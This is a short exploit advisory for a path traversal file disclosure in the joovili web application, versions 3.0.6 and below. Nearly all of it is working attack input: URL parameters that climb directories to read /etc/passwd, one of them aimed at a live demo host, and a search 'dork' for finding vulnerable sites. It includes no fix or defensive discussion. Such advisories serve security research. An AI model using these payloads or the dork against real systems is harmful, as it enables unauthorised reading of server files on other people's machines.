joovili versions 3.0.6 and below suffer from a remote file disclosure vulnerability in joovili.images.php.
904076a35da3187803d4e79e803ad471d3fa704f8c49084eb079a2842b1f0996
found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili